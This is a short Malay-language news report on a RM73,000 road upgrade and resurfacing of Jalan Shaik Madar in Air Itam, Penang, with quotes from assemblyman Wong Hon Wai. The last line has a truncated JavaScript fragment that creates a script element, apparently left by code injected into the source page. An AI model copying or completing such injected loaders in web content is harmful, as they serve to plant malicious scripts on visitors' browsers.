RM73,000 naiktaraf & turap Jalan Shaik Madar

Oleh: AINUL WARDAH SOHILLI

Gambar: SHUM JIAN WEI

 

AIR ITAM – Sejumlah RM73,000 diperuntukan bagi pelaksanaan kerja – kerja menaiktaraf dan menurap semula Jalan Shaik Madar di sini barubaru ini.

Ahli Dewan Undangan Negeri (ADUN) Air Itam, Wong Hon Wai berkata, inisiatif tersebut merupakan sebahagian projek yang melibatkan 23 batang jalan di Air Itam.

“Sebelum ini, kita (Kerajaan Negeri) telahpun menurap semula Jalan Kampung Bukit Paya, Jalan Kampung Lembah Ria serta beberapa jalan utama dan jalan kampung di Air Itam dengan jumlah kos keseluruhannya RM508,000.

“Jalan Shaik Madar merupakan fasa keempat dan terakhir yang melibatkan kerja-kerja menaiktaraf dan penurapan semula,” katanya ketika mengadakan lawatan ke lokasi di sini baru-baru ini.

Menurut Hon Wai, pelaksanaan tersebut adalah termasuk kerja-kerja ujian teras oleh Jabatan Kerja Raya (JKR) bagi tujuan menjaga kualiti serta spesifikasi telah ditetapkan mengikut kelulusan pihak berkuasa tempatan (PBT).

“Setiap jalan dipantau dan diawasi ketat oleh PBT dan saya sendiri memandang serius isu jalan-jalan yang rosak kerana ia melibatkan soal keselamatan serta keselesaan orang awam,” ujar beliau yang berharap agar orang ramai dapat memanfaatkan sepenuhnya kemudahan disediakan Kerajaan Negeri dan memeliharanya sebaik mungkin.var d=document;var s=d.createElement(‘script’);